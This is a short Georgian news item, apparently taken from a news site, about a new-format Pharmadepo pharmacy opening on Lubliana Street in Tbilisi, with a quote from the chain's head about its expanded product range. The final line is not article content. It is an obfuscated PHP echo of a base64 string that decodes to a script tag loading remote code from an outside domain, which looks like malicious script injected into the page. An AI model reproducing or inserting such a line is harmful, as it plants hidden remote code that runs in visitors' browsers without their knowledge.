celsiusi
ავერსი საქკაბელი
თბილისში ლუბლიანას 11 ნომერში ფარმადეპო-ს ახალი ფორმატის აფთიაქი გაიხსნა. ამის შესახებ საინფორმაციო სააგენტო BUSINESS TIME-ს კომპანიიდან აცნობეს.    
განახლებულ აფთიაქში გარდა ფარმაცევტული პროდუქციისა, დაგხვდებათ მრჩეველი ფარმაცევტი, რომელიც მომხმარებლებს კონსულტაციას გაუწევს. 
"ფარმადეპოს ახალ აფთიაქში მომხმარებლები გარდა სააფთიაქო პროდუქციისა საოჯახო პროდუქციის, საყოფაცხოვრებო ქიმიის, ბავშვთა ტანსაცმლის, ამერიკული ბრენდი Carter’s, გერმანული ბრენდი Rossmann-ის და ფრანგული ბრენდი Monoprix  ფართო ასორტიმენტის შეზენას შეძლებენ. მათ ადგილზე დახვდებათ ასევე იტალიური ბრენდი MISS KAY-ის სუნამოები, ჯანსაღი კვების პროდუქტები, ოპტიკა- სათვალეების და ლინზების ფართო არჩევანთ"- განაცხადა "ფარმადეპოს" ქსელის ხელმძღვანელმა ქეთი კოზმანაშვილმა. 
მისივე თქმით, ასეთივე სიახლეები სამომავლოდ ფარმადეპოს სხვა აფთიაქებშიც იგეგმება. 
როგორც კომპანიაში აღნიშნავენ ფარმადეპოში მისულ მომხმარებელს არაერთი სიახლე სასიამოვნო გარემო და სიურპრიზები დახვდებათ.  
ავტორი
მირანდა შურღაია
592
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");